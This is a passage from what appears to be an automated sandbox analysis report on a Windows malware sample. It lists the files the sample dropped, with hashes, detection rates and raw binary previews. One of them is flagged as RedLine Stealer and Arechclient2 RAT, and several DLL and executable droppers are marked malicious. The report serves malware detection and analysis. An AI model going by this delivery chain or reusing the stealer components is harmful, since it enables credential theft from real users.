SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\softokn3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\vcruntime140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe

Download File

Process:	C:\Users\user\Desktop\zLwT7vCojz.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8538160
Entropy (8bit):	7.894832692431241
Encrypted:	false
SSDEEP:	196608:PYATHrqMo097ughAPM6R5b9dXXvRRHmRqB7:PzLqMo09aghAk6Lnfm4B7
MD5:	54D53F5BDB925B3ED005A84B5492447F
SHA1:	E3F63366D0CC19D48A727ABF1954B5FC4E69035A
SHA-256:	4D97E95F172CF1821EC078A6A66D78369B45876ABE5E89961E39C5C4E5568D68
SHA-512:	F6A5B88E02E8F4CB45F8AAE16A6297D6F0F355A5E5EAF2CBBE7C313009E8778D1A36631122C6D2BCFEA4833C2F22DFD488142B6391B9266C32D3205575A8FF72
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3% Antivirus: Virustotal, Detection: 3%, Browse
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...A..c.....................(t...................@.................................)....@......@..............................(4...0....r.............0P......x6...................................................................................text............................... ..`.itext..T........................... ..`.data...,'.......(..................@....bss.... S... ...........................idata..(4.......6..................@....didata.............................@....tls....<............2...................rdata...............2..............@..@.reloc..h6.......8...4..............@..B.rsrc.....r..0....r..l..............@..@.............@.......z..............@..@........................................................

C:\Users\user\AppData\Local\Temp\d6072408

Download File

Process:	C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
File Type:	PNG image data, 3680 x 2256, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	7175750
Entropy (8bit):	7.997145606333841
Encrypted:	true
SSDEEP:	98304:vH6iII1nFLrq9NF65iY3YZ019+s71up2h92Xf41tiE6Lldqib9dKuhSyVF8ZYGXO:/THrqMo097ughAPM6R5b9dXXvRRHmRqj
MD5:	15FE0C4C282DF938F0AE415334FC8D11
SHA1:	0B97FA302ED3F3C2B5DBB2DC8F0386E578EBC14D
SHA-256:	EE44025DB5AD03B33944BF734F6F256D8B996E89F2EC22197C1767FBAE70853D
SHA-512:	FAE66F89BC0007D59570A87EF815295A9499299086BBD2418DD17176C814A9FFC4559FC99B9FA2A1EC14E9D18B4206CE406CC483F04691F3A644CB6A84F932B5
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...`............{.. .IDATx..w\.......ET...kF...Ix...i...ZVv...+%#eU....v.......:.\.....~..<.t...\.}.\|.c.....................................................................@.,...............................W.................................._.$................................... ................................U@.,...............................W.................................._.$....................OLwM.#3q...Lk.<w......u@..J/..gQV..k...+.GyO..P".U@e.ep.g...>.L.../8..E...&Sv7a..'.........(WHLA....:7..\....9....}p=)....t..kUhW...".c.c.E..}).o..._X.......e3c.(.0........V.._.2...7..5.^-.i..8y..v.C..r..o.?~.f.HU...........8....3...?.........Y...&\|.:.ZE..).;]..R.Z...KLxzT{.D.&.....I-.e.EM~Z.s.......W]at.sr~.[.Lyv..V:....s..U..bc...mQ[..-......E'-.......=."..e........g.Y.T.....v..q..N..;[....$..t........[P).....&..~g.gj...R...r..y......$.V=.+......,.V. ..~.j.....`.....S...4._..%1..U...n...I....}.eb6.W.........d........i.}g..F9,[.*.

C:\Users\user\AppData\Local\Temp\db474e1d

Download File

Process:	C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe
File Type:	data
Category:	modified
Size (bytes):	1513199
Entropy (8bit):	7.76549562224101
Encrypted:	false
SSDEEP:	24576:4BUqAOiscWrrxSf5xyF/UahfMHl4ka7Z1x1nsHf1tYV9+nEsNIviAziGulS50:4BUqtrrxSf5xyF/16laLxqdtYX+nEPvy
MD5:	9B62A2FBF34899D4700B9555F5FF3FEC
SHA1:	0D139FE038D02BFCA133843D423724673E7E01D1
SHA-256:	1D15AFBF9EADD8F5BD19E6F4CCAF62B3D77330AAD1FC89F712281DED2F820DF0
SHA-512:	0779F1E323BAB3F09438B25B1329F895309A64BCB377690AEBC61338273E0E55422F117640857D0E93D565BFE9598DD58DAAF727F8A1A680CCE6DAB7B834DCF0
Malicious:	false
Reputation:	unknown
Preview:	\|...~...........~...[...k...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................Z...;...Z........(.....,..............,..................................................<........:......................................................................................<.....6.........................................................................................Z..;...#.......:.................................................................................Q...M...........................................

C:\Users\user\AppData\Local\Temp\driverRemote_debug\UIxMarketPlugin.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	1640960
Entropy (8bit):	6.484662993855079
Encrypted:	false
SSDEEP:	49152:/7Q2CH7FiYk7q8wOP2nyh9VgFdJYZL6MsQv4Pvg3KIA8wuSgKacXTT3Kos2lpm:sZH7FZk7LP2nyh9VgFdJYZL6NQgPVIAv
MD5:	D1BA9412E78BFC98074C5D724A1A87D6
SHA1:	0572F98D78FB0B366B5A086C2A74CC68B771D368
SHA-256:	CBCEA8F28D8916219D1E8B0A8CA2DB17E338EB812431BC4AD0CB36C06FD67F15
SHA-512:	8765DE36D3824B12C0A4478C31B985878D4811BD0E5B6FBA4EA07F8C76340BD66A2DA3490D4871B95D9A12F96EFC25507DFD87F431DE211664DBE9A9C914AF6F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 18% Antivirus: Virustotal, Detection: 13%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.e.^.6.^.6.^.6.&K6.^.6.&[6.^.6.^.6.].6.(V6.^.6.(b6[^.6.(c6._.6.(g6.^.6.(S6.^.6.(R6.^.6.(U6.^.6Rich.^.6................PE..L.....kU...........%.........4............................................................@..........................*..........T............................ .........................................@............................................text............................... ..`.rdata..Y;.......<..................@..@.data........0...^..................@....rsrc................p..............@..@.reloc..d.... .......v..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2469936
Entropy (8bit):	6.434916453080517
Encrypted:	false
SSDEEP:	49152:Y8UMSn5cV2N9LNwtQ5gRR+moI1axGbYj6QAl4ImDkg7d5lROCDG5yzlC97W+uJUM:QMS5hN9OtQ5gRjoI8xGbYj6QAl4gg7dF
MD5:	9FB4770CED09AAE3B437C1C6EB6D7334
SHA1:	FE54B31B0DB8665AA5B22BED147E8295AFC88A03
SHA-256:	A05B592A971FE5011554013BCFE9A4AAF9CFC633BDD1FE3A8197F213D557B8D3
SHA-512:	140FEE6DAF23FE8B7E441B3B4DE83554AF804F00ECEDC421907A385AC79A63164BD9F28B4BE061C2EA2262755D85E14D3A8E7DC910547837B664D78D93667256
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]..<...<...<...D...<...J...<...J).A<...J(..=...D...<...<...?...J,..=...J...<...J...<..Rich.<..........................PE..L... .kU..........................................@..........................0&......&&...@.................................H. ......0"...............%.0 ...."..K...................................C..@...............,..... .@....................text............................... ..`.rdata...=.......>..................@..@.data....-....!....... .............@....rsrc........0".......!.............@..@.reloc...N...."..P...@".............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\driverRemote_debug\groupware.wav

Download File

Process:	C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
File Type:	data
Category:	dropped
Size (bytes):	20891
Entropy (8bit):	5.41735141652497
Encrypted:	false
SSDEEP:	384:lhFF7DUQMnBNgCxPE/7tDEZAXMtV3STIxyd3A3lafgfdl6ii04ZQoUXXhnF6b2xD:fBMYqPE/7tDEZAK3STIxnlrn6U4ZhUXp
MD5:	FCE67E49E191BC3FD22997050C92BA01
SHA1:	34C08D6D404A94C2447B671A49731364EA0B47FF
SHA-256:	F8EB44951269696615DFA62E8221C73D8EBCE0A820211956D5BF6C0A70C6DACF
SHA-512:	4C4E1F908824DAA7F3081773CA22138C756601C6C6113E0DCF9CBC958E90A5028D9BE7E5404F19432D70B1E90D46919274188718D29F9A46B97E7ACBE8222991
Malicious:	false
Reputation:	unknown
Preview:	.j.yvH.w....F.....m....^.OL`......c.`..Ldqsp.N.....v...\ae].yH.E.`^..d...m.W.U....L......]q..]hbT.Y.TLNcOP`.r.C.Lv.A...V^Fg.dr.i.^..o.GXp.H......yu...xEIAb.LGn_Y.........gjE[...hkhU..A..Adq.QlsO...`Rt..J]..s..u.j.......[lcxNuN.ZoANK..yth]q..t..DL.A`..Q.`_P...x.\..`..I.G.b.Iml.....MVfq.r[sE.HV..a.h.W.d.[QF.N...P.uaFNBdFj.s.W...x...Y...ZJ..x.u.iCyeyv.QxL.O..j.ckOGE^..xSv...^W].S.k\.en.VIuYfSuS...qu...f....K..]f...._.O.O.o.d...m.OArv...Lq....menEX..d..Qf..\FiRd.L.Vu.t.BJ...u.RR.JekI.PDg..g.H....\k..F..LX.a_.m..Bj.brCBh...v.a....ch.D[...G.....D....j.NaelL.F.^a.a.ur.^.tsN..ZH.Io.N.tr.f.exr.D.SNbHIR....]Jb.D.nlu..B.LnY..jp.n...bpmqb...Kc..y.ut.N._m.G.r.c..y.m..]cF.V.F...sMC.yrv..i....O..IAvn.vn..B.A.w.BDF...]M....b.G.XlB.xar..g.q...N..AU.E.Ox....R..k...vaP...S..sQ.....R[O..I.I.dma.T..S.E.y.a.FG...wOk..Q..\U.]..`..x\Z...ps.J..F.....Qf...Z.Pi.L..P.b.\.Tm.P.R.B.PU..d...k..[iS^.TH^N.hjrwwg._....wL....[.I.rt..g.]x..qh[Y.H.xn.N...A..wRF..W.V....jyU.Du.o...p..vO.m.lOTjk.HW.......L.dO....C..bQ.L..i.

C:\Users\user\AppData\Local\Temp\driverRemote_debug\macrospore.indd

Download File

Process:	C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
File Type:	data
Category:	dropped
Size (bytes):	1385173
Entropy (8bit):	7.824453259021933
Encrypted:	false
SSDEEP:	24576:3ThHnVpIact6qMIPrpLhmwg9lUKOxrcP4912kZp/GYOQWINQvshJC6lVwymgw:DhHVfC6q7PrpLhmwDKOxrg4r2kEINQvX
MD5:	31885BEFE89EAE873D959F47BB548157
SHA1:	4A1D665C491D334EAE72CDD5B784F2A064A8FBBF
SHA-256:	A06A3D6810B4B5F73A0B71487F9B32538C34F66E26F0DC1632F3D40BF0E11B71
SHA-512:	0C1561929D19E52229E8FE3295148C8E4BC73526A59028F9FBB5BD11D2A8163CC6137232B55082AA1FC1E5F444F583064F4BC7BF282730B754BEE3C9656ED5D0
Malicious:	false
Reputation:	unknown
Preview:	..ZJpL.......C\.bFNR.cgl\..j.......\u...KRCMZ....KY^.L..ap...BbB..J\.qH..o.e....]OZuwL..Nnvv..f.F.fV.T......n..Q....yhai....P.......l........O.sO.dX.RdX...L.i.q..UNub..IJ..C....FH.uq.xn..^Cfs..pb....RUlHfEr`..U....^wcX..Se.uYkc..kb.Z[O..K.F.u.i..pibZ]_O.`....\UJpL.eJ`..ro.xE.mJ]O.R...D.Cft...J..feJ...IuHV.fpvV.xnW.XaN..A..Z.JupSsC..u.N.Gm..j.L..[R.....Yv]U..hrwy.jV...oSK...ffiH..H.RK.gmJw.i.uK..rN.Ei.\PHj...gE...C..dC...u...N._.fYV.e.d.a..M.T....sd.k.....S.w.....R`k......Sd.Kg.i.\.m..p.w.s...]Gx..e^....Q...PBs.\W.e.Xv.....D.a[K].[V.Ku.^Q.s...Gu.d.LO.l.YN...k....QD.\..JN.tUG...OeM.KR..uK.t..V.RB.\.h.h....d.HA.t.i...[.an...y.....``^EiEXul.gUG..uH..Z.nGU....H..O.D...s.P.kmoSk.[ZVvO..X..ae..LqtTN..K.PDn...........]rZOy.V.Mq.bgP....xM..VD__....iup[.\Ma....ty.PKFid..g..nThl..w...ub......o.j.R.e....iuLb.p..wA.].d.f....Ub...mV.Xvv.U.f.E..A..Zv.ZP.d......LVi_...O..nwI\N.F...d..y..j..^C.Hu.Am[Jw.S]ul..d.m[..UQT.Hl..QDC.uZ..Ds.Z..W.X.w..^....ryJi`lj...O...xJ..jNVU.se.c.I.D.....O....P\GW`...Zn.E.x

C:\Users\user\AppData\Local\Temp\driverRemote_debug\relay.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1596416
Entropy (8bit):	6.466475314379774
Encrypted:	false
SSDEEP:	49152:h2gm39uH+I5/GxEoadcqX7Q9F7r40YB+eTMq+PDXx1lWz0pd:tmtuH+e/RoadcqX7Qz7rDY8vq+Pbx1lc
MD5:	EA945E6BC518D0B25AAC0FCE13AE6E16
SHA1:	4144AC69F72190F1AD163A7CC7BD38E18109122C
SHA-256:	6D9D8727E9D8C00EB74B27C6EE3FDC90D538F30CF6A07C4B939A03FC70CE59EE
SHA-512:	4E2F4CF61FC6364DDACA6B0BF6D917F8E136526DC1323A8BAA48166CB291285491CC2D083B65EBE30F3DC27F62B2E154A834C721140E6004596D655269239A95
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S1,..PB..PB..PB.x&.<PB.x&.PB.x&.cQB..(...PB..(.>PB..PC..SB.x&..PB.x&..PB.x&..PB.x&..PB.Rich.PB.........PE..L.....kU...........%.....\...........0.......p......................................1.....@.................................dP..\|....p...............................}..................................@............p..,............................text...6Z.......\.................. ..`.rdata..J....p.......`..............@..@.data...\........Z...t..............@....rsrc........p......................@..@.reloc..6...........................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\eee577ad

Download File

Process:	C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe
File Type:	data
Category:	modified
Size (bytes):	1513199
Entropy (8bit):	7.765495676253857
Encrypted:	false
SSDEEP:	24576:ABUqAOiscWrrxSf5xyF/UahfMHl4ka7Z1x1nsHf1tYV9+nEsNIviAziGulS50:ABUqtrrxSf5xyF/16laLxqdtYX+nEPvy
MD5:	B8A6D044F40D799762522BEC449D8F39
SHA1:	9F89B3CF6F740AA8CAFBD4AD0D2B80C3CC9537D8
SHA-256:	503AE27E37C3327A911156249B6B4349579C30AF9199A152B09EBB0D7278366D
SHA-512:	E0D072837E7F72A4D64BA36C8CD92E85C4C9799C629B92243D2B070ECF3828EA143CD125ED5DA2680B19B960CE164D350283A3A1BF1D60531181F51E9D8AE13E
Malicious:	false
Reputation:	unknown
Preview:	\|...~...........~...[...k...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................Z...;...Z........(.....,..............,..................................................<........:......................................................................................<.....6.........................................................................................Z..;...#.......:.................................................................................Q...M...........................................

C:\Users\user\AppData\Local\Temp\hplcabqlulk

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Apr 23 06:43:20 2024, mtime=Tue Apr 23 06:43:21 2024, atime=Tue Apr 23 06:43:20 2024, length=2469936, window=hide
Category:	dropped
Size (bytes):	1038
Entropy (8bit):	4.97708962914361
Encrypted:	false
SSDEEP:	24:8fru2B9klJmXOIxlEmli90AlZB4SiIoCuadZtm:8fru2BYmeIomliBl53h/Zt
MD5:	311BB9403B40135D395CD921664DED20
SHA1:	E2E1FFBDB33E13F125AAD977D1E8AF5D6CEC2BA7
SHA-256:	D5EC91A372BB5810E069E717A36B8A07C54224479E16205C624CD9B2962D313D
SHA-512:	39750D9A57BFFA3A595A5A9500A9B739156A5178C7C30135393216DF1D195DDBA45D5DA2F3A749184C410C8F7964E3E970942B99BCCB7B71AB56249786A7BF74
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... ...m7..Q...E...Q.....O.Q...0.%.......................:..DG..Yr?.D..U..k0.&...&......Qg._...~...Q....~.xa.......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.XUL..........................3N.A.p.p.D.a.t.a...B.V.1......Xk=..Roaming.@......EW.=.Xo=..........................f2..R.o.a.m.i.n.g.....n.1......Xk=..DRIVER~1..V......Xk=.Xo=.....=....................d5..d.r.i.v.e.r.R.e.m.o.t.e._.d.e.b.u.g.....z.2.0.%..Xk= .UNIVER~1.EXE..^......Xk=.Xk=.....=......................0.U.n.i.v.e.r.s.a.l.I.n.s.t.a.l.l.e.r...e.x.e.......{...............-.......z............{^......C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe..O.....\.....\.....\.....\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.d.r.i.v.e.r.R.e.m.o.t.e._.d.e.b.u.g.\.U.n.i.v.e.r.s.a.l.I.n.s.t.a.l.l.e.r...e.x.e.`.......X.......287400...........hT..CrF.f4... ..y.T....,......hT..CrF.f4... ..y.T....,......E.......9...1SPS..mD..pH.H@..=x....

C:\Users\user\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.1.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	4282
Entropy (8bit):	5.517171550223942
Encrypted:	false
SSDEEP:	96:SMWR5u33uKsTckgUEJ56fJIPAIPAIPAIP6P6P6P/P/PWrusfrZ:SMA5bKsTckgUEJ56+PJPJPJP6P6P6P/0
MD5:	97778FFCBEE0E386F61C3CBC3CB433F1
SHA1:	072C632B7716934FA1AADE335809EF97D82617F5
SHA-256:	5B066B4DA46415A278445B0544E4F9AC2F10E55159BBCF625F75160AC483F187
SHA-512:	0319A61C603ED2AAD13BF2DBCCF6C718F8EA8E00B73D7544B19459AC8AC045A2A42EF6FB0BF9CBE82E2BDB15350BE50E37445668FDD99175C6A8D5F61D7C44F7
Malicious:	false
Reputation:	unknown
Preview:	[04/23/24 09:43:19] Main : OS Version = osWin10...[04/23/24 09:43:19] CommandLineSwitchExists : Result of check = False. Param Value (if not exact match) = ...[04/23/24 09:43:19] Installer Target URL request = {"IPAddress":"192.168.2.7","Status":1,"Language":"en","OSMinorVersion":0,"OSMajorVersion":10,"ProductId":"5488CB36-BE62-4606-B07B-2EE938868BD1","Is64Bit":true,"ECommId":"11A12794-499E-4FA0-A281-A9A9AA8B2685"}...[04/23/24 09:43:20] Installer target url response = {"Url":"https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe","ProductName":"System Mechanic Standard","Result":0,"ErrorMessage":null}...[04/23/24 09:43:20] DownloadAndLaunchInstaller : Creating BITS download handler...[04/23/24 09:43:20] !&TioloBITSHandler.InitCopyMgr : CreateCOMObject(CLSID_BackgroundCopyManager1_5)..[04/23/24 09:43:26] !&TioloBITSHandler.InitCopyMgr : Copy manager initialized = True...[04/23/24 09:43:26] DownloadAndLaunchInstaller : Target folder ="C:\User

C:\Users\user\AppData\Local\Temp\pfswlxy

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	785920
Entropy (8bit):	6.809737341976147
Encrypted:	false
SSDEEP:	12288:QiMA0ejRLfxLY8flLb1MgXeXbFAsFWylkkoAbtEIwhsrU:QeDxttLeLFAsFlSjf
MD5:	33230F52772BD46C208DFE85537F567F
SHA1:	260AAB3C0DD5909C449B62DA56998F8ABD68A235
SHA-256:	3F1759A3D89D7B7893BBCDEB180BAB911C960A6D1C80A04BCDA199A8284C36EA
SHA-512:	98E3B0337ABD53BA405F76D1FCE17F9EC173C507B3DD3B89A259950AEE744FB337767BC534E817BF1DB7D5B692245DC5A3CF351BED06980DDEE2B0F19A48B10B
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\pfswlxy, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\pfswlxy, Author: Joe Security Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: C:\Users\user\AppData\Local\Temp\pfswlxy, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 59% Antivirus: Virustotal, Detection: 60%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....,T............................~.... ........@.. .......................`..............................................,...O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................`.......H............=..............H............................................0............. ....X..%-.&sp...sq...}-..... ....Y.~).....UY.).... .....7...%.....~(.....[Y.)....sr...~).....TY.)....os.........%.~t.... ....X~t.... ....X~t.... ....X(.....%.~).....SY.)......~).....RY.)....~0...%-.&~/.........su...%.0...(...+}.....0........... ....X..{M.....0............(..... .p..Y. ...@\...\a..Z3.+.~t.... .M..X+2~...... ....^ ...l_.3.+. 4.rc H:;..+.~t.... ...X..#.......@. ..... ....\

C:\Users\user\AppData\Local\Temp\tmp13AA.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp27DB.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.848598812124929
Encrypted:	false
SSDEEP:	24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
MD5:	9664DAA86F8917816B588C715D97BE07
SHA1:	FAD9771763CD861ED8F3A57004C4B371422B7761
SHA-256:	8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
SHA-512:	E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp37A8.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp76DC.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp76EC.tmp

Download File

